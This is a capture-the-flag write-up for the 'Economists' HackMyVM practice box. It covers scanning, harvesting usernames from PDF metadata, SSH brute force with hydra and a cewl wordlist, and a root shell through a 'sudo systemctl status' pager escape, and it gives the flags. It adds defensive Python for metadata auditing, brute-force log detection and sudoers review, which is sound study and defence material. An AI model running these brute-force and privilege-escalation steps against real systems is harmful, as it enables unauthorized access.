[HackMyVM] Lab box: Economists

This post walks through a penetration test of the target at 192.168.56.145: port scanning with Nmap, finding an open FTP service and trying anonymous login, inspecting the PDF files there for usernames, directory enumeration with gobuster, and finally brute-forcing SSH on the way to root.

Difficulty: Easy

kali: 192.168.56.104

Target: 192.168.56.145

Port scan

┌──(root㉿kali2)-[~]
└─# nmap 192.168.56.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 18:58 CST
Nmap scan report for 192.168.56.145
Host is up (0.000081s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E0:55:E3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds

Open ports: 21, 22, 80

Try anonymous FTP login

┌──(root㉿kali2)-[~/Desktop]
└─# ftp 192.168.56.145
Connected to 192.168.56.145.
220 (vsFTPd 3.0.3)
Name (192.168.56.145:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11414|)
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000       173864 Sep 13  2023 Brochure-1.pdf
-rw-rw-r--    1 1000     1000       183931 Sep 13  2023 Brochure-2.pdf
-rw-rw-r--    1 1000     1000       465409 Sep 13  2023 Financial-infographics-poster.pdf
-rw-rw-r--    1 1000     1000       269546 Sep 13  2023 Gameboard-poster.pdf
-rw-rw-r--    1 1000     1000       126644 Sep 13  2023 Growth-timeline.pdf
-rw-rw-r--    1 1000     1000      1170323 Sep 13  2023 Population-poster.pdf
226 Directory send OK.

Quite a few PDF files. Pulled them down with get and looked through them; the PDF contents are nothing special, so check the metadata for usernames instead.

┌──(root㉿kali2)-[~/Desktop]
└─# exiftool *.pdf | grep Author
Author                          : joseph
Author                          : richard
Author                          : crystal
Author                          : catherine
Author                          : catherine

That yields a few usernames, which may come in handy.
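The usernames above come straight from the /Author field in the PDF Info dictionary, which authoring tools fill in by default. The following is an added example (my code, not the author's or the box's) that does the defender-side check: scan the raw bytes of a PDF for /Author entries so that documents can be reviewed before they are dropped on an anonymous FTP share. It handles both literal "(...)" strings (including backslash escapes) and hex "<...>" strings with a UTF-16BE BOM. The sample PDF skeletons are constructed here and are not the target's files; note that this raw scan does not see metadata stored inside compressed object streams, which a tool such as exiftool does decode.

```python
from __future__ import annotations
import re

# PDF name /Author followed by a literal "(...)" or hex "<...>" string object.
_AUTHOR_RE = re.compile(rb"/Author\s*(\((?:[^()\\]|\\.)*\)|<[0-9A-Fa-f\s]*>)")
# Backslash escapes allowed inside PDF literal strings (octal \ddd is handled separately).
_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
            b"(": b"(", b")": b")", b"\\": b"\\"}


def _unescape(match) -> bytes:
    seq = match.group(1)
    if re.fullmatch(rb"[0-7]{1,3}", seq):
        return bytes([int(seq, 8) & 0xFF])
    return _ESCAPES.get(seq, seq)


def _decode_pdf_string(token: bytes) -> str:
    """Decode one PDF string object (literal or hex) into text."""
    if token.startswith(b"<"):
        hexdigits = re.sub(rb"\s", b"", token[1:-1])
        if len(hexdigits) % 2:            # PDF pads a trailing odd digit with 0
            hexdigits += b"0"
        raw = bytes.fromhex(hexdigits.decode("ascii"))
    else:
        raw = re.sub(rb"\\([0-7]{1,3}|.)", _unescape, token[1:-1])
    if raw.startswith(b"\xfe\xff"):       # UTF-16BE text string with BOM
        return raw[2:].decode("utf-16-be")
    # PDFDocEncoding is close enough to Latin-1 for the ASCII names usually found here.
    return raw.decode("latin-1")


def extract_pdf_authors(data: bytes) -> list[str]:
    """Return every /Author value found in the raw (uncompressed) bytes of a PDF."""
    return [_decode_pdf_string(m.group(1)) for m in _AUTHOR_RE.finditer(data)]


def audit_pdf_metadata(files: dict[str, bytes]) -> dict[str, list[str]]:
    """Map filename -> authors for each file that still carries an /Author entry."""
    report = {}
    for name, data in files.items():
        authors = extract_pdf_authors(data)
        if authors:
            report[name] = authors
    return report


# Constructed sample documents (minimal PDF skeletons, not the files from the target).
SAMPLE_PDFS = {
    "sample-literal.pdf": (b"%PDF-1.4\n1 0 obj\n<< /Title (Brochure) /Author (joseph) "
                           b"/Producer (LibreOffice) >>\nendobj\n%%EOF\n"),
    "sample-escaped.pdf": (b"%PDF-1.4\n1 0 obj\n<< /Author (team \\(finance\\)) >>\n"
                           b"endobj\n%%EOF\n"),
    "sample-utf16.pdf": (b"%PDF-1.4\n1 0 obj\n"
                         b"<< /Author <FEFF0063006100740068006500720069006E0065> >>\n"
                         b"endobj\n%%EOF\n"),
    "sample-clean.pdf": b"%PDF-1.4\n1 0 obj\n<< /Title (No author field) >>\nendobj\n%%EOF\n",
}

if __name__ == "__main__":
    for name, authors in audit_pdf_metadata(SAMPLE_PDFS).items():
        print(f"{name}: /Author = {authors}  <- strip before publishing")
```

Run it over the files you intend to publish; anything listed still carries an account name and should be stripped (exiftool can remove the field) before it goes anywhere an anonymous user can read it.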

Run a quick directory scan first

┌──(root㉿kali2)-[~]
└─# gobuster dir -u http://192.168.56.145 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.145
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,bak,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.145/images/]
/index.html           (Status: 200) [Size: 35027]
/about.html           (Status: 200) [Size: 23219]
/contact.html         (Status: 200) [Size: 14317]
/blog.html            (Status: 200) [Size: 15196]
/main.html            (Status: 200) [Size: 931]
/services.html        (Status: 200) [Size: 17709]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.145/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.145/js/]
/cases.html           (Status: 200) [Size: 18018]
/readme.txt           (Status: 200) [Size: 410]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.145/fonts/]
/.html                (Status: 403) [Size: 279]
Progress: 433406 / 1323366 (32.75%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 433517 / 1323366 (32.76%)
===============================================================
Finished
===============================================================

Take a look at the web site

Nothing exploitable there.

Try brute-forcing SSH with the harvested usernames. rockyou didn't produce a hit, so the wordlist is probably the problem; use cewl to build a wordlist from the words on the web site instead.

┌──(root㉿kali2)-[~/Desktop]
└─# cewl http://192.168.56.145 > passes.txt

┌──(root㉿kali2)-[~/Desktop]
└─# hydra -L user.txt -P passes.txt ssh://192.168.56.145 -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 19:22:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 1848 login tries (l:4/p:462), ~29 tries per task
[DATA] attacking ssh://192.168.56.145:22/
[22][ssh] host: 192.168.56.145   login: joseph   password: wealthiest
[STATUS] 494.00 tries/min, 494 tries in 00:01h, 1386 to do in 00:03h, 32 active

That gives a working set of credentials: joseph:wealthiest
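From the target's side, the hydra run above leaves a very recognisable trail in sshd's log: a burst of "Failed password" lines from one source across several usernames, followed by an "Accepted password" from the same source. The following is an added example (my code, not the author's) of the detection logic a defender would run over auth.log: a sliding-window count of failures per source IP, and a high-severity alert when a flagged source later logs in successfully. The log excerpt is constructed for the example (hostnames and addresses chosen to match the write-up, but not captured from the box), and the year is assumed because syslog timestamps do not carry one.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One sshd auth.log line of the "Failed/Accepted password" kind (syslog format, no year).
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line, year=2024):
    """Return (timestamp, result, user, ip) for a password-auth line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; the caller supplies it (assumed 2024 here)
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_ssh_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Count failed logins per source in a sliding window; flag a later success from a flagged source."""
    recent = defaultdict(list)      # ip -> failure timestamps inside the window
    tried = defaultdict(set)        # ip -> usernames attempted
    flagged = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, result, user, ip = rec
        if result == "Failed":
            bucket = recent[ip]
            bucket.append(ts)
            while bucket and ts - bucket[0] > window:   # drop failures older than the window
                bucket.pop(0)
            tried[ip].add(user)
            if len(bucket) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({
                    "severity": "medium", "ip": ip, "users": sorted(tried[ip]),
                    "reason": f"{len(bucket)} failed SSH logins within {int(window.total_seconds())}s",
                })
        elif ip in flagged:
            alerts.append({
                "severity": "high", "ip": ip, "users": [user],
                "reason": f"successful password login as {user} after brute-force activity",
            })
    return alerts


# Constructed sample auth.log excerpt (not captured from the target): one source cycles
# through several usernames and then succeeds; a second source fails once; one non-sshd line.
SAMPLE_AUTH_LOG = """\
Apr  4 11:22:07 elite-economists sshd[1700]: Failed password for joseph from 192.168.56.104 port 50120 ssh2
Apr  4 11:22:08 elite-economists sshd[1702]: Failed password for invalid user richard from 192.168.56.104 port 50121 ssh2
Apr  4 11:22:09 elite-economists sshd[1704]: Failed password for invalid user crystal from 192.168.56.104 port 50122 ssh2
Apr  4 11:22:10 elite-economists sshd[1706]: Failed password for invalid user catherine from 192.168.56.104 port 50123 ssh2
Apr  4 11:22:11 elite-economists sshd[1708]: Failed password for joseph from 192.168.56.104 port 50124 ssh2
Apr  4 11:22:12 elite-economists sshd[1710]: Failed password for joseph from 192.168.56.104 port 50125 ssh2
Apr  4 11:22:30 elite-economists sshd[1720]: Failed password for joseph from 192.168.56.10 port 41000 ssh2
Apr  4 11:22:40 elite-economists sshd[1730]: Accepted password for joseph from 192.168.56.104 port 50130 ssh2
Apr  4 11:23:00 elite-economists CRON[1740]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

if __name__ == "__main__":
    for a in detect_ssh_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(f"[{a['severity']}] {a['ip']}: {a['reason']} (users: {', '.join(a['users'])})")
```

The single failure from 192.168.56.10 never reaches the threshold and stays quiet, while the first source is flagged on its fifth failure and escalated when it gets in. The same pattern is what fail2ban's sshd jail bans on; limiting MaxAuthTries in sshd_config and disabling password authentication in favour of keys removes the attack path that this box relies on.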

That logs straight in and gives the user flag

┌──(root㉿kali2)-[~/Desktop]
└─# ssh joseph@192.168.56.145 
The authenticity of host '192.168.56.145 (192.168.56.145)' can't be established.
ED25519 key fingerprint is SHA256:nKBoUMUnxyKH34KaiDU6gjV4RVOrd181pL9rHCLLD0s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.145' (ED25519) to the list of known hosts.
joseph@192.168.56.145's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 04 Apr 2024 11:25:01 AM UTC

  System load:  0.26               Processes:               115
  Usage of /:   47.3% of 11.21GB   Users logged in:         0
  Memory usage: 7%                 IPv4 address for enp0s3: 192.168.56.145
  Swap usage:   0%


 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

51 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


joseph@elite-economists:~$ id
uid=1001(joseph) gid=1001(joseph) groups=1001(joseph)
joseph@elite-economists:~$ ls -al
total 32
drwxr-xr-x 4 joseph joseph 4096 Apr  4 11:23 .
drwxr-xr-x 6 root   root   4096 Sep 13  2023 ..
-rw------- 1 joseph joseph    0 Sep 14  2023 .bash_history
-rw-r--r-- 1 joseph joseph  220 Sep 13  2023 .bash_logout
-rw-r--r-- 1 joseph joseph 3771 Sep 13  2023 .bashrc
drwx------ 2 joseph joseph 4096 Apr  4 11:23 .cache
drwxrwxr-x 3 joseph joseph 4096 Sep 13  2023 .local
-rw-r--r-- 1 joseph joseph  807 Sep 13  2023 .profile
-rw-rw-r-- 1 joseph joseph 3271 Sep 14  2023 user.txt
joseph@elite-economists:~$ cat user.txt 


                                                                                                    
                                                                                                    
                      ...................                 ....................                      
                 .............................        .............................                 
             ............              ...........     ......              ............             
           ........                         ........                             ........           
        ........              ...              ........           ....              .......         
       ......                .....         ..     ......          .....                ......       
     .............................        .....     ......        .............................     
    ..............................       .....        .....       ..............................    
                                        .....          .....                                        
                                       .....            .....                                       
                                      .....              .....                                      
                                      .....              .....                                      
                                     .....                ....                                      
 .................................................................................................. 
................................................................................................... 
                                     .....               .....                                      
                                      .....              .....                                      
                                      .....              .....                                      
                                       .....            .....                                       
                                        .....          .....                                        
    ..............................       .....        .....       ..............................    
     .............................        ......     .....        .............................     
       ......                .....         .......     ..         .....                ......       
        ........              ...            .......              ....              .......         
           ........                            .........                         ........           
             ...........               ......     ...........               ...........             
                ..............................       ..............................                 
                     .....................                ....................                      
                                                                                                    
                                                                                                    
Flag: HMV{37q3p33CsMJgJQbrbYZMUFfTu}

sudo -l

joseph@elite-economists:~$ sudo -l
Matching Defaults entries for joseph on elite-economists:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joseph may run the following commands on elite-economists:
    (ALL) NOPASSWD: /usr/bin/systemctl status

Run it directly:

sudo /usr/bin/systemctl status

Then, at the pager prompt on the bottom line, type !bash and you have a root shell.
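The root cause here is the sudo rule itself: systemctl status hands its output to an interactive pager, and since sudo launched systemctl as root, the pager's shell escape runs as root too. The following is an added example (my code, not the author's or the box's) of the audit a defender would run over sudoers rules or over the "may run the following commands" lines of sudo -l: it flags commands that page or are interactive, treats NOPASSWD as an aggravating factor, and reports the fix. The sample sudoers content is constructed for the example; only the joseph rule mirrors what the box actually grants.

```python
import os
import re

# Constructed sample sudoers (not the target's /etc/sudoers). The joseph rule mirrors the
# box; the ops rule shows the same command in a hardened form next to an unhardened one.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
joseph ALL=(ALL) NOPASSWD: /usr/bin/systemctl status
ops ALL=(root) /usr/bin/systemctl status apache2 --no-pager, /usr/bin/journalctl -u apache2
alice ALL=(ALL) NOPASSWD: /usr/bin/less /var/log/syslog
%admin ALL=(ALL) ALL
"""

# A sudoers user specification: who host=(runas) [TAG:]... command[, command...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)
# The "(runas) TAG: command" lines that `sudo -l` prints for the current user
SUDO_L_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

PAGER_CMDS = {"systemctl", "journalctl"}      # page long output unless --no-pager is given
INTERACTIVE_CMDS = {"less", "more", "most", "man", "vi", "vim", "view", "nano"}


def classify_command(cmd):
    """Return (problem, fix) for one command spec, or None if it looks safe."""
    tokens = cmd.split()
    if not tokens:
        return None
    if tokens[0] == "ALL":
        return "grants every command", "restrict the rule to the specific commands this role needs"
    binary = os.path.basename(tokens[0])
    if binary in PAGER_CMDS and "--no-pager" not in tokens[1:]:
        return (f"{binary} hands its output to an interactive pager",
                f"append --no-pager to the rule, i.e. '{cmd} --no-pager' "
                "(sudoers matches arguments exactly, so the user must type it the same way)")
    if binary in INTERACTIVE_CMDS:
        return (f"{binary} is an interactive program with a shell escape",
                "remove the rule or replace it with a non-interactive wrapper script")
    return None


def audit_sudoers(lines, current_user="<sudo -l user>"):
    """Audit sudoers rule lines (or `sudo -l` output lines) and return a list of findings."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line) or SUDO_L_RE.match(line)
        if not m:
            continue
        who = m.groupdict().get("who") or current_user
        nopasswd = "NOPASSWD" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            result = classify_command(cmd)
            if result is None:
                continue
            problem, fix = result
            severity = "info" if cmd == "ALL" else ("high" if nopasswd else "medium")
            findings.append({"who": who, "cmd": cmd, "nopasswd": nopasswd,
                             "severity": severity, "problem": problem, "fix": fix})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS.splitlines()):
        print(f"[{f['severity']}] {f['who']}: {f['cmd']} -> {f['problem']}; fix: {f['fix']}")
```

Setting a pager through the environment is not a reliable fix here, because sudo's env_reset strips PAGER and SYSTEMD_PAGER before systemctl runs; putting --no-pager in the rule (as the ops entry does) is what actually removes the escape, and sudo's exact argument matching means the user cannot drop the flag.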

joseph@elite-economists:~$ sudo /usr/bin/systemctl status
● elite-economists
    State: running
     Jobs: 0 queued
   Failed: 0 units
    Since: Thu 2024-04-04 10:57:17 UTC; 32min ago
   CGroup: /
           ├─user.slice 
           │ └─user-1001.slice 
           │   ├─user@1001.service …
           │   │ └─init.scope 
           │   │   ├─1776 /lib/systemd/systemd --user
           │   │   └─1777 (sd-pam)
           │   └─session-4.scope 
           │     ├─1760 sshd: joseph [priv]
           │     ├─1856 sshd: joseph@pts/0
           │     ├─1857 -bash
           │     ├─1898 sudo /usr/bin/systemctl status
           │     ├─1899 /usr/bin/systemctl status
           │     └─1900 pager
           ├─init.scope 
           │ └─1 /sbin/init maybe-ubiquity
           └─system.slice 
             ├─apache2.service 
             │ ├─759 /usr/sbin/apache2 -k start
             │ ├─764 /usr/sbin/apache2 -k start
             │ └─765 /usr/sbin/apache2 -k start
             ├─systemd-networkd.service 
             │ └─641 /lib/systemd/systemd-networkd
             ├─systemd-udevd.service 
             │ └─393 /lib/systemd/systemd-udevd
             ├─cron.service 
             │ └─659 /usr/sbin/cron -f
             ├─polkit.service 
             │ └─667 /usr/lib/policykit-1/polkitd --no-debug
             ├─networkd-dispatcher.service 
!bash
root@elite-economists:/home/joseph# id
uid=0(root) gid=0(root) groups=0(root)
root@elite-economists:~# cat ro*


                                                                                                    
                                                                                                    
                      ...................                 ....................                      
                 .............................        .............................                 
             ............              ...........     ......              ............             
           ........                         ........                             ........           
        ........              ...              ........           ....              .......         
       ......                .....         ..     ......          .....                ......       
     .............................        .....     ......        .............................     
    ..............................       .....        .....       ..............................    
                                        .....          .....                                        
                                       .....            .....                                       
                                      .....              .....                                      
                                      .....              .....                                      
                                     .....                ....                                      
 .................................................................................................. 
................................................................................................... 
                                     .....               .....                                      
                                      .....              .....                                      
                                      .....              .....                                      
                                       .....            .....                                       
                                        .....          .....                                        
    ..............................       .....        .....       ..............................    
     .............................        ......     .....        .............................     
       ......                .....         .......     ..         .....                ......       
        ........              ...            .......              ....              .......         
           ........                            .........                         ........           
             ...........               ......     ...........               ...........             
                ..............................       ..............................                 
                     .....................                ....................                      
                                                                                                    
                                                                                                    
Flag: HMV{NwER6XWyM8p5VpeFEkkcGYyeJ}

Now this is what Easy difficulty is supposed to look like.
